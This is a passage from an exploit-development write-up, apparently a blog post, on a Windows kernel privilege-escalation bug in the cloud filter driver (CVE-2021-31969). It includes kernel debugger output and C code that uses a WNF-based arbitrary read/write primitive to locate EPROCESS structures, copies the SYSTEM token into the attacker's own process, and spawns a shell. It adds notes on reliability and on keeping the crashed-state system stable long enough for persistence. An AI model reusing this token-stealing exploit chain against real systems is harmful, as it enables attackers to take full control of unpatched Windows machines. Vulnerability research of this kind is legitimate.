ffffd685bcbeb160: Not a valid object (ObjectType invalid)
Object: ffffd685bcd59140 Type: (ffffd685b7ebd380) Process
ObjectHeader: ffffd685bcd59110 (new version)
HandleCount: 6 PointerCount: 196453
ffffd685bcbeb168: Not a valid object (ObjectType invalid)
1: not a valid object (ObjectHeader invalid @ -offset 30)
7: kd> dq ffffd685bcbeb140
ffffd685`bcbeb140 000000d8`00000000 00000000`00000048
ffffd685`bcbeb150 fffff801`2726ad00 00000000`00000000
ffffd685`bcbeb160 ffffd685`bcd59140 00000000`00000001 <- EPROCESS
ffffd685`bcbeb170 00000000`00008000 00000000`00000001
Turns out that every EtwR object + 0x20(0x30 including chunk headers) contains an EPROCESS
pointer, giving us the info leak required.
To summarize:
SessionObject
pointer until we find the byte pattern AlIn
AlIn
allocationEtwR
to locate the EtwR object allocationBOOL LocateEPROCESSAddresses(int WnfIndex, HANDLE RwToken, ULONG_PTR TokenSessionObject, ULONG_PTR *OwnEproc, ULONG_PTR *SystemEproc)
{
BOOL status = FALSE;
PBYTE twoPageBuffer = NULL;
DWORD bufferSize = PAGE_SIZE * 2;
BYTE pageBuffer[PAGE_SIZE] = { 0 };
DWORD *cur = NULL;
ULONG_PTR allocationBase = NULL;
ULONG_PTR addrBuffer = NULL;
ULONG64 dataBuffer = 0;
PEPROCESS eproc = NULL;
twoPageBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, bufferSize);
if (!twoPageBuffer) {
printf("[-] HeapAlloc fail: 0x%08X\n", GetLastError());
goto out;
}
status = ArbitraryRead(WnfIndex, RwToken, TokenSessionObject, twoPageBuffer, bufferSize);
if (!status)
goto out;
cur = twoPageBuffer;
for (int i = 0; i < bufferSize / sizeof(DWORD); i++) {
if (cur[i] != 'nIlA')
continue;
// found tag, move back 0x4 bytes
allocationBase = TokenSessionObject + ((ULONG64)&(cur[i-1]) - (ULONG64)twoPageBuffer);
printf("[+] Found AlIn allocation at 0x%llx\n", allocationBase);
status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x38, &addrBuffer, 0x8);
if (!status || !addrBuffer)
goto out;
// found IoCompletion
printf("[+] Found IoCompletion object at 0x%llx\n", addrBuffer);
allocationBase = addrBuffer;
status = ArbitraryRead(WnfIndex, RwToken, allocationBase, &pageBuffer, PAGE_SIZE);
if (!status)
goto out;
// find EtwR tag
cur = pageBuffer;
for (int i = 0; i < PAGE_SIZE / sizeof(DWORD); i++) {
if (cur[i] != 'RwtE')
continue;
// found tag, move back 0x4 bytes
allocationBase += ((ULONG64)&(cur[i-1]) - (ULONG64)pageBuffer);
// extract EPROCESS
status = ArbitraryRead(WnfIndex, RwToken, allocationBase + 0x30, &addrBuffer, 0x8);
if (!status || !addrBuffer)
goto out;
if (addrBuffer < 0xffff000000000000) {
puts("[-] Can't find EPROCESS");
goto out;
}
// found EPROCESS
printf("[+] Found EPROCESS object at 0x%llx\n", addrBuffer);
eproc = (PEPROCESS)addrBuffer;
do {
status = ArbitraryRead(WnfIndex, RwToken, &eproc->UniqueProcessId, &dataBuffer, 0x8);
if (!status)
goto out;
if (dataBuffer == GetCurrentProcessId()) {
*OwnEproc = eproc;
printf("[+] Found own EPROCESS address: 0x%llx\n", eproc);
}
else if (dataBuffer == 0x4) {
*SystemEproc = eproc;
printf("[+] Found system EPROCESS address: 0x%llx\n", eproc);
}
if (*OwnEproc && *SystemEproc) {
status = TRUE;
goto out;
}
status = ArbitraryRead(WnfIndex, RwToken, &eproc->ActiveProcessLinks, &dataBuffer, 0x8);
if (!status)
goto out;
eproc = CONTAINING_RECORD(dataBuffer, EPROCESS, ActiveProcessLinks);
} while (eproc != addrBuffer);
}
}
out:
if (twoPageBuffer)
HeapFree(GetProcessHeap(), 0, twoPageBuffer);
return status;
}
Afterwards it’s just overwriting PreviousMode
, stealing token, restoring PreviousMode
and spawning shell.
BOOL StealToken(PEPROCESS OwnEproc, PEPROCESS SystemEproc)
{
ULONG64 token = NULL;
if (!NtArbitraryRead(&SystemEproc->Token, &token, 0x8))
return FALSE;
if (!NtArbitraryWrite(&OwnEproc->Token, &token, 0x8))
return FALSE;
return TRUE;
}
Through empirical evidence I conclude that the exploit works about 1 in 15 tries on average. A large proportion of the failed attempts actually successfully overwrote WNF objects, but they also overwrote the adjacent TOKEN objects, rendering the WNF object unusable. A way to improve success rate on this version of Windows would be to overwrite WNF sizes with a larger value, such as 0x3000. That way we can query for more potentially untouched TOKEN objects. However I believe WNF only allows a maximum write of 0x1000 on later Windows versions.
The exploit will crash the system once it exits, so we have to keep the process running.
This is because the system will try to follow the linked list of _TERMINATION_PORT
objects to free each of them, but we’ve corrupted the list at some point. A way to fix this will be to terminate the list at the first object by reading _ETHREAD->TerminationPort
, but this results in our spray objects never being freed and thus a memory leak. However, we’ve also corrupted VS subsegment headers, WNF and TOKEN objects along the way, which may all cause a crash at some point.
Empirically as long as we keep the process running, the system will be stable long enough to perform basic persistence activities.
CVE-2023-36036 patched this November stems from the same function HsmpRpiDecompressBuffer
, and is reported to be actively exploited in the wild. Unlike the CVE-2021-31969
patch which restricts the minimum value cstmDataSize
can take, this patch limits the maximum value of cstmDataSize
to 0x4000, which is the maximum bytes HsmpRpReadBuffer would read. This suggests a possible OOB operation due to the previously uncapped size.
I would like to thank my mentor @linhlhq for patiently guiding and assisting me through the exploit development process. This work would not have been possible without his wisdom and experience.